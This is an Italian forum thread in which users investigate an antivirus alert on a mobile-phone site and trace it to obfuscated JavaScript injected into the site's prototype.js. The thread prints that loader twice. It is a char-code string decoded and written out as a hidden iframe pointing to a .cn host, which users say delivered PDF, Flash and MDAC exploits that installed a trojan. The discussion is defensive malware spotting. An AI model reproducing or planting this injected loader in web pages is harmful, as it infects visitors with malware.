Ciao ragazzi, in questi giorni ho notato che ogni volta che accedo al sito http://www.spaziocellulare.com/News/ (hxxp://www.spaziocellulare.com/News/), NOD32 mi avvisa di questo http://img42.imageshack.us/img42/3842/immaginepqo.th.jpg (http://img42.imageshack.us/my.php?image=immaginepqo.jpg).
Potrebbe essere un falso positivo o anche il vostro AV vi segnala qualcosa?

confermo l'infezione

Perfetto... a me avira e prevx non han segnato niente...:muro:
Forse perchè con noscript non ho caricato lo script malevolo?

esatto
per vedere l'infezione devi avere abilitati gli script per spaziocellulare.com,a questo punto dovresti vedere la redirezione verso il sito .cn

ilovehash.cn
L'ho visto, l'ho permesso temporaneamente, ma ancora i suddetti antivirus non mi hanno segnalato niente... merito di ABP?

ilovehash.cn
L'ho visto, l'ho permesso temporaneamente, ma ancora i suddetti antivirus non mi hanno segnalato niente... merito di ABP?

non credo, io ce l'ho ABP attivo con tutte le liste ma non blocca niente, o meglio NOD32 interviene prima di lui

Forse me la devo prendere con Avira o Prevx allora...

o forse hanno corretto nel frattempo :p

no no è ancora infetto

no no è ancora infetto
son sotto sanboxie ed esce la schermata
firefox non sa come aprire questo indirizzo perchè non è associato ad alcun programma
se provo ad aprire il link
:confused:

...che file?

...che file?

ciao juninho, specifico meglio, aprendo il link del primo post La schermata che mi apre firefox è
"FIREFOX NON SA COME APRIRE QUESTO INDIRIZZO , DATO CHE IL PROTOCOLLO (HXPP) NON E'ASSOCIATO AD ALCUN PROGRAMMA

ah :doh:
devi sostituire le xx con tt...hai mai visto un sito avere hxxp per suffisso?!:D

ah :doh:
devi sostituire le xx con tt...hai mai visto un sito avere hxxp per suffisso?!:D

ops...........chiedo venia...:doh:

niubbality!:sofico:

no no è ancora infetto

sì vero, dovevo abilitare amung.us per vedere il puntamento a *.cn :D
ma nel codice sorgente della pagina non riescoa vedere il link... :mbe:

Forse me la devo prendere con Avira o Prevx allora...

Nod32 rileva uno script pericoloso, ma quello script dovrà caricare un eseguibile. Quando lo script tenterà di caricarlo, allora Avira o Prevx interverranno

sì vero, dovevo abilitare amung.us per vedere il puntamento a *.cn :D
ma nel codice sorgente della pagina non riescoa vedere il link... :mbe:

no no,bisogna abilitare spaziocellulare.com,amung dovrebbe essere solo un counter d'accessi
piuttosto mi sfugge la riga di codice incriminata...o abbiamo a che fare con una immagine cammuffata?:O

Nod32 rileva uno script pericoloso, ma quello script dovrà caricare un eseguibile. Quando lo script tenterà di caricarlo, allora Avira o Prevx interverranno
Grazie :)

no no,bisogna abilitare spaziocellulare.com,amung dovrebbe essere solo un counter d'accessi
piuttosto mi sfugge la riga di codice incriminata...o abbiamo a che fare con una immagine cammuffata?:O

Mi sembra si tratti di un .swf maligno

non trovo nemmeno contenuti swf :wtf:

son sotto sanboxie ed esce la schermata
firefox non sa come aprire questo indirizzo perchè non è associato ad alcun programma
se provo ad aprire il link
:confused:

ovviamente l'ho scritto in quel modo per evitare che chiunque vi accedesse senza un minimo di attenzione:ciapet:

ovviamente l'ho scritto in quel modo per evitare che chiunque vi accedesse senza un minimo di attenzione:ciapet:

si lo so..hai fatto bene e richiedo venia..a me cmq inizialmente non è intervenuto nessuno sfw di sicurezza pur permettendo gli script, dopo qualche minuto pero' avira ha segnalato l'infezione nella cache di mozilla

La riga di codice incriminata (un iframe nascosto) è proprio lì in bella mostra, in uno script della pagina.

Gli expolit sfruttati, per scaricare un bel trojan sono i soliti, pdf, mdac, flash player...

ho capito,ma qual'è?!:D

E' qua dentro:
htxp://www.spaziocellulare.com/News/wp-includes/js/prototype.js?ver=1.6

Il primo che lo trova vince una birra fredda (virtuale :asd:)

Element.addMethods();
var cMcZHKvAzzmllBeZClTk = "S60S105S102S114S97S109S101S32S119S105S100S116S104S"+
"61S34S52S56S48S34S32S104S101S105S103S104S116S61S34S54S48S34S32S115S114S99S61S"+
"34S104S116S116S112S58S47S47S105S108S111S118S101S104S97S115S104S46S99S110S47S1"+
"14S97S115S116S97S115S112S47S116S46S112S104S112S34S32S115S116S121S108S101S61S3"+
"4S98S111S114S100S101S114S58S48S112S120S59S32S112S111S115S105S116S105S111S110S"+
"58S114S101S108S97S116S105S118S101S59S32S116S111S112S58S48S112S120S59S32S108S1"+
"01S102S116S58S45S53S48S48S112S120S59S32S111S112S97S99S105S116S121S58S48S59S32"+
"S102S105S108S116S101S114S58S112S114S111S103S105S100S58S68S88S73S109S97S103S10"+
"1S84S114S97S110S115S102S111S114S109S46S77S105S99S114S111S115S111S102S116S46S6"+
"5S108S112S104S97S40S111S112S97S99S105S116S121S61S48S41S59S32S45S109S111S122S4"+
"5S111S112S97S99S105S116S121S58S48S34S62S60S47S105S102S114S97S109S101S62";
var lOkXfOmtYDfAPHaXSWXR = cMcZHKvAzzmllBeZClTk.split("S");
var VJCHLggOSAyEOicuxOoV = "";
for (var RTWgbw=1; RTWgbw<lOkXfOmtYDfAPHaXSWXR.length; RTWgbw++)
{
document.write(String.fromCharCode(lOkXfOmtYDfAPHaXSWXR[RTWgbw]));
}

:burp::asd:

:cincin:

E' qua dentro:
htxp://www.spaziocellulare.com/News/wp-includes/js/prototype.js?ver=1.6

Il primo che lo trova vince una birra fredda (virtuale :asd:)

non avevo guardato negli script che venivano richiamati dal sorgente della pagina, non son stato attento :muro:
comunque sempre in accodamento viene inserita l'aggiunta :)

E' qua dentro:
htxp://www.spaziocellulare.com/News/wp-includes/js/prototype.js?ver=1.6



sempre ottimo :)

non trovo nemmeno contenuti swf :wtf:

Dal .cn arrivano incapsulati due file uno .swf ed uno in .pdf

Dal .cn arrivano incapsulati due file uno .swf ed uno in .pdf

ah ok,quelli sono i file che sfruttano le vulnerabilità,io chiedevo più che altro qualche porzione di codice reindirizzasse a ciò,non immaginando che fosse contenuto in uno script hostato sul loro stesso sito

Ma in tutto questo li avete avvertiti?

come si fa a vedere se si è 'stati infettati'?!

io sono andato sul sito ma non mi pare sia successo nulla di strano, ho l'ultimo firefox e noscript :stordita:

a meno che non abbia autorizzato manualmente lo script .cn non sei infetto

allora dovrei essere a posto, visto che non mi è apparso niente da autorizzare o cliccare ;)

Ma in tutto questo li avete avvertiti?

appena inviata un'e-mail all'amministratore;)

comunque, se è vero quello che segnala nod32(trojan downloader) la questione non è banale:cool:

appena inviata un'e-mail all'amministratore;)

probabilmente non l'ha ancora letta :asd:

:rolleyes: :muro:

ma alla fine antivir riesce a bloccarlo o no :confused:

intendo dire nel caso venga avviato da ie.

il sito è down quindi stanno risolvendo, si spera!

Fino a ieri il sito mi pare funzionasse, e Nod32 saranno almeno 3, 4 giorni che non mi avverte più di nessuna minaccia, quindi credo abbiano risolto già il problema in precedenza.

sarà pure down ma di certo non per risolvere il problema

mi sa dire qualcuno perche non si riesce aprire spaziocellulare della amatissimo mimmox

se il server è down non puoi caricare le sue pagine :)

sarà pure down ma di certo non per risolvere il problema

ma pensate che risolveranno il problema

Hanno "risolto" spostandosi su un blog.

hanno tolto il redirect al blog, però lo script è sempre lì :mbe:

Element.addMethods();
var cMcZHKvAzzmllBeZClTk = "S60S105S102S114S97S109S101S32S119S105S100S116S104S"+
"61S34S52S56S48S34S32S104S101S105S103S104S116S61S34S54S48S34S32S115S114S99S61S"+
"34S104S116S116S112S58S47S47S105S108S111S118S101S104S97S115S104S46S99S110S47S1"+
"14S97S115S116S97S115S112S47S116S46S112S104S112S34S32S115S116S121S108S101S61S3"+
"4S98S111S114S100S101S114S58S48S112S120S59S32S112S111S115S105S116S105S111S110S"+
"58S114S101S108S97S116S105S118S101S59S32S116S111S112S58S48S112S120S59S32S108S1"+
"01S102S116S58S45S53S48S48S112S120S59S32S111S112S97S99S105S116S121S58S48S59S32"+
"S102S105S108S116S101S114S58S112S114S111S103S105S100S58S68S88S73S109S97S103S10"+
"1S84S114S97S110S115S102S111S114S109S46S77S105S99S114S111S115S111S102S116S46S6"+
"5S108S112S104S97S40S111S112S97S99S105S116S121S61S48S41S59S32S45S109S111S122S4"+
"5S111S112S97S99S105S116S121S58S48S34S62S60S47S105S102S114S97S109S101S62";
var lOkXfOmtYDfAPHaXSWXR = cMcZHKvAzzmllBeZClTk.split("S");
var VJCHLggOSAyEOicuxOoV = "";
for (var RTWgbw=1; RTWgbw<lOkXfOmtYDfAPHaXSWXR.length; RTWgbw++)
{
document.write(String.fromCharCode(lOkXfOmtYDfAPHaXSWXR[RTWgbw]));
}

in
http://www.spaziocellulare.com/News/wp-includes/js/prototype.js?ver=1.6
non è cambiato nulla

Il server che distribuiva l'exploit a me risulta down

confermo

confermo

tutto bloccato?

non saprei,ora è in manutenzione

non saprei,ora è in manutenzione

nessuna novità? è ancora down?

si

certo che è mooolto strano che sia sempre in manutenzione ....
secondo me hanno chiuso i battenti :(

certo che è mooolto strano che sia sempre in manutenzione ....
secondo me hanno chiuso i battenti :(

qualcuno può contattare il buon Fabiano1987 :rolleyes:

ciao
anch'io usavo molto il sito perchè ben fatto e completo di risorse e altro ...
sempre down da 20 giorni
nessuno ha notizie ... oppure un nuovo indirizzo?
oltre a Fabiano vi erano altri mod, che si trovano in altri forum nessuno li conosce per contattarli?

ciao
anch'io usavo molto il sito perchè ben fatto e completo di risorse e altro ...
sempre down da 20 giorni
nessuno ha notizie ... oppure un nuovo indirizzo?
oltre a Fabiano vi erano altri mod, che si trovano in altri forum nessuno li conosce per contattarli?

io sto provando a contattare fabiano... :mc:

Notizie??? ancora non va...

Notizie??? ancora non va...
io ho provato a contattare via mail Fabiano e Ueshiba ma non ho ricevuto nessuna risposta :(

cavolo
il sito non và più
pensare che chiedevano anche un contributo per diventare utentiplus!
... sento aria di fregatura finale!

cavolo
il sito non và più
pensare che chiedevano anche un contributo per diventare utentiplus!
... sento aria di fregatura finale!

no mi spiace, su questo ti debbo contraddire, ero utente plus e premium :fagiano:

Ho appena scritto a Fabiano, vediamo se risponde. Io mi ero appena iscritto come premium. Con il fatto dei certificati che non si trovavano piu sui siti cinesi credo che a primavera abbiano avuto un boom di iscrizioni, ma non credo che il bottino fosse da 'scappare con la cassa', anzi quel forum credo, per come era strutturato, che attraesse un bel po' di pubblicità...........quindi rimango dubbioso :confused:

Ho appena scritto a Fabiano, vediamo se risponde. Io mi ero appena iscritto come premium. Con il fatto dei certificati che non si trovavano piu sui siti cinesi credo che a primavera abbiano avuto un boom di iscrizioni, ma non credo che il bottino fosse da 'scappare con la cassa', anzi quel forum credo, per come era strutturato, che attraesse un bel po' di pubblicità...........quindi rimango dubbioso :confused:

anche io resto perplesso, non mi sembra il caso di una truffa
però non ho ricevuto risposta, potrebbero pur sempre essere in vacanza :sborone:

nessuna novità??

nessuna novità??

potreste provare anche voi a contattarlo qui
http://it-it.facebook.com/ispazio

o qui?
http://www.ispazio.net/

sembra che sia attivo, vivo e vegeto o mi sbaglio :confused:

:mbe:

potreste provare anche voi a contattarlo qui
http://it-it.facebook.com/ispazio

o qui?
http://www.ispazio.net/

sembra che sia attivo, vivo e vegeto o mi sbaglio :confused:

:mbe:

fatto,inviato un messaggio su FB

Il motivo che ha determinato questa discussione è ben diverso da quello che state discutendo, cosa che potreste fare anche in altra sede, onde ragion per cui si chiude.